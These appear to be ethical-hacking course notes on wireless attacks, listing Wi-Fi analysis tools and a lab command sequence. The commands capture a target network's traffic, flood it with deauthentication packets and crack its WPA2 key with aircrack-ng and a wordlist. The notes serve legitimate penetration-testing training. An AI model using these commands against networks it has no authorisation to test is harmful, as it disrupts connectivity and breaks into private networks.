Module 16: Wireless Attacks

Ethical hackers or pen testers use numerous tools and techniques to hack target wireless networks. The recommended labs that will assist you in learning various wireless network hacking techniques include:

  1. Perform wireless traffic analysis

    • Wi-Fi packet analysis using Wireshark

  2. Perform wireless attacks

    • Crack a WPA2 network using Aircrack-ng

ifconfig wlan0 up
airodump-ng wlan0
airodump-ng --bssid "your bssid" --channel "your ch" --write file1 wlan0
aireplay-ng --deauth 100000 -a "your bssid" wlan0
wireshark "your filename.cap"
aircrack-ng "your filename.cap" -w /usr/share/wordlists/rockyou.txt
aircrack-ng -a2 -b [Target BSSID] -w [wordlist] '[cap file]'
## Tools used in this section : 
1. AirMagnet WiFi Analyzer PRO (https://www.netally.com)
2. SteelCentral Packet Analyzer (https://www.riverbed.com)
3. Omnipeek Network Protocol Analyzer (https://www.liveaction.com)
4. CommView for Wi-Fi (https://www.tamos.com) to analyze Wi-Fi traffic.

Last updated